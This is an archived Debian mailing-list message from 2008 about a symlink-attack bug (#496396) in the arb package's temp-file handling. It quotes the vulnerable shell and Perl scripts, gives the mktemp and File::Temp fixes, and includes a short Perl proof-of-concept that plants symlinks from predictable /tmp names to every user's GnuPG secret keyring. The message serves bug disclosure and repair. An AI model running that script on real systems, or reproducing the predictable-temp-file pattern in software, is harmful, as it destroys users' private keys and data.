[Debian-med-packaging] Bug#496396: The possibility of attack with the help of symlinks in some Debian packages
Dmitry E. Oboukhov
unera at debian.org
Mon Sep 22 14:56:28 UTC 2008
On 08:36 Mon 22 Sep , Andreas Tille wrote:
> Hi,
> unfortunately I completely missed this bug because I had a "relaxing from
> DebConf" vacation and it must somehow vanished from my mailbox - so sorry
> for caring so late.
> Now I had a look at Arb packaging and have to admit I do not really
> understand which issue exactly fullfills the symlink attack problem.
> Could you please be a little bit more specific (provide the output of
> the script for arb) to enable us to fix this problem quickly?
> Kind regards and thanks for your QA work
look at full report: http://uvw.ru/report.lenny.txt
if attacker creates symlink /tmp/arb_fdnaml_${USER}_$$ or
/tmp/arbdsmz.html then starting scripts
/usr/lib/arb/SH/arb_fastdnaml or
/usr/lib/arb/SH/dszmconnect.pl will lead to data corrupt.
example for attacker script:
#!/usr/bin/perl
symlink '/tmp/arbdsmz.html', '/path/to/file';
for my $user (
map {
chomp;
$_=[split ':', $_];
[$_->[0], $_->[5]]
} `cat /etc/passwd`
)
{
symlink "$$user[1]/.gnupg/secring.gpg",
"/tmp/arb_fdnaml_$$user[0]_$_" for ($$ .. $$+1000000);
}
use mktemp (1) (with option -t) for create temp-files in bash-scripts.
use File::Temp module for create temp files in perl-scripts.
cut of report:
Package: arb-common
Version: 0.0.20071207.1-4
Filename: pool/non-free/a/arb/arb-common_0.0.20071207.1-4_all.deb
Found error in /usr/lib/arb/SH/arb_fastdnaml:
$ grep -A5 -B5 /tmp/ /usr/lib/arb/SH/arb_fastdnaml
#!/bin/sh
tmp=/tmp/arb_fdnaml_${USER}_$$
mv infile $tmp
nice -19 $1 < $tmp &
sig=$!
/bin/echo "$sig $$ \c" >>/tmp/arb_pids_${USER}_${ARB_PID}
wait
# echo $tmp not deleted for debugging purposes
rm -f $tmp
rm -f checkpoint.$sig
mv treefile.$sig treefile
Found error in /usr/lib/arb/SH/dszmconnect.pl:
$ grep -A5 -B5 /tmp/ /usr/lib/arb/SH/dszmconnect.pl
</body>
</html>";
open (OUTPUT , "> /tmp/arbdsmz.html") or die "cannot open input file /tmp/arbdsmz.html";
if (scalar(@ARGV) == 0)
{print OUTPUT $errordocument;
die("no search items given ! Give at least one item!");}
##print length(@ARGV)."\n";
--
my $selection_content = 'VAR_DATABASE=bact&VAR_HITS=25&VAR_DSMZITEM='."$item1".'&VAR_DSMZITEM2='."$item2".'&B1=Search';
$req_selection->content($selection_content);
# Pass request to the user agent and get a response back
my $res_selection = $ua_selection -> request($req_selection, '/tmp/arbdsmz.htm');
# Check the outcome of the response
if ($res_selection->is_success) {print $res_selection->content;}
else {die "Bad luck this time, request failed\n";};
open (INPUT , "< /tmp/arbdsmz.htm") or die "cannot open input file /tmp/arbdsmz.htm";
my $htmlcontent;
{
local $/;
--
$htmlcontent =~ s{HREF="}{HREF="http://www.dsmz.de}igm;
$htmlcontent =~ s{HREF=[^"]}{HREF=http://www.dsmz.de/}igm; ##"
print OUTPUT $htmlcontent ;
#exec ('netscape', '/tmp/arbdsmz.html');
print "file:///tmp/arbdsmz.html";
##print "$htmlcontent\n";
--
. ''`. Dmitry E. Oboukhov
: :’ : unera at debian.org
`. `~’ GPGKey: 1024D / F8E26537 2006-11-21
`- 1B23 D4F8 8EC0 D902 0555 E438 AB8C 00CF F8E2 6537
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: Digital signature
Url : http://lists.alioth.debian.org/pipermail/debian-med-packaging/attachments/20080922/b5c039ab/attachment.pgp
More information about the Debian-med-packaging
mailing list